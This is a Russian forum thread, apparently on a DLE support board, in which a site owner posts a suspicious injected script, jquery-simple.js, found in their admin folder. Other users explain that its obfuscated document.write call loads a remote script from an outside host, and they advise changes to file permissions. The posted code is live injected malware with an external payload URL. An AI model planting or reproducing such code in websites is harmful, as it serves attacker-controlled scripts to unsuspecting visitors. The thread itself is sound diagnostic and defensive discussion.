Перейти к публикации

Рекомендованные сообщения

Сегодня при проверке Антивирусом в админке была обнаружена левая папка JS со скриптом jquery-simple.js .Выкладываю здесь код-гляньте что за зверь:

:("; expires="+ expires.toGMTString()))+ ((path==null)?"":("; path="+path))+ ((domain==null)?"":("; domain="+domain))+ ((secure==true)?"; secure":"")} gomega();
clicko=0;



function gomega()

{

clicko=clicko+1;

if(clicko<2)

{

Traf1788Ru=GoMegaBR('rgood_2');


if(Traf1788Ru<=2)

{

nexting=Number(Traf1788Ru)+1;

lolypop(nexting)}

}


}


function lolypop(gocode)

{

day=new Date();


id=day.getTime();


document.write('<scr'+'ipt type="text/javas'+'cript" src="http://po'+'st.r'+'n'+'b'+'m.r'+'u/j'+'s/sm'+'ar'+'tblock/get-code.js"></scr'+'ipt>');


pathname="/";

myDomain="/";

var largeExpDate=new Date();

largeExpDate.setTime(largeExpDate.getTime()+(4*60*60*1000));

Setkyks('rgood_2',gocode,largeExpDate,"/")}




function GoMegaBRVal(offset){


var endstr=document.cookie.indexOf(";",offset);


if(endstr==-1)

endstr=document.cookie.length;

return unescape(document.cookie.substring(offset,endstr))}


function GoMegaBR(name){

var arg=name+"=";

var alen=arg.length;

var clen=document.cookie.length;

var i=0;

while(i<clen){

var j=i+alen;

if(document.cookie.substring(i,j)==arg)

return GoMegaBRVal(j);

i=document.cookie.indexOf(" ",i)+1;

if(i==0)

break}

return null}


function Setkyks(name,value){

var argv=Setkyks.arguments;

var argc=Setkyks.arguments.length;

var expires=(argc>2)?argv[2]:null;

var path=(argc>3)?argv[3]:null;

var domain=(argc>4)?argv[4]:null;

var secure=(argc>5)?argv[5]:false;

document.cookie=name+"="+escape(value)+

((expires==null)?""

Изменено пользователем hrompic
Ссылка на сообщение
Поделиться на других сайтах

document.write('<scr'+'ipt type="text/javas'+'cript" src="http://po'+'st.r'+'n'+'b'+'m.r'+'u/j'+'

s/sm'+'ar'+'tblock/get-code.js"></scr'+'ipt>');

цепляет левый js <script type="text/javascript" src="http://post.rnbm.ru/js/smartblock/get-code.js"></script>

Ссылка на сообщение
Поделиться на других сайтах

document.write('<scr'+'ipt type="text/javas'+'cript" src="http://po'+'st.r'+'n'+'b'+'m.r'+'u/j'+'

s/sm'+'ar'+'tblock/get-code.js"></scr'+'ipt>');

цепляет левый js <script type="text/javascript" src="http://post.rnbm.ru/js/smartblock/get-code.js"></script>

Спасибо большое! А кроме этой папки для данного скрипта ничего не может быть еще на хостинге? Или этой папки достаточно чтобы скрипт выводился?

И подскажите как обезопасить папку с шаблонами от заливки туда вот таких скриптов?

Изменено пользователем hrompic
Ссылка на сообщение
Поделиться на других сайтах

И подскажите как обезопасить папку с шаблонами от заливки туда вот таких скриптов?

Скрипт в папки шаблонов ничего не заливает, поэтому DLE обезопасить вас от заливки чего либо не может. Но рекомендуется, если вы не собираетесь файлы шаблона редактировать через админпанель скрипта, тогда убрать права на запись у папки и файлов шаблона.

Ссылка на сообщение
Поделиться на других сайтах

И подскажите как обезопасить папку с шаблонами от заливки туда вот таких скриптов?

Скрипт в папки шаблонов ничего не заливает, поэтому DLE обезопасить вас от заливки чего либо не может. Но рекомендуется, если вы не собираетесь файлы шаблона редактировать через админпанель скрипта, тогда убрать права на запись у папки и файлов шаблона.

Какие права нужно выставить7

Спасибо!

Ссылка на сообщение
Поделиться на других сайтах

Какие права нужно выставить7

adfrw (0664)

А на папку?

Ссылка на сообщение
Поделиться на других сайтах

На папки 755, на файлы 644

Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...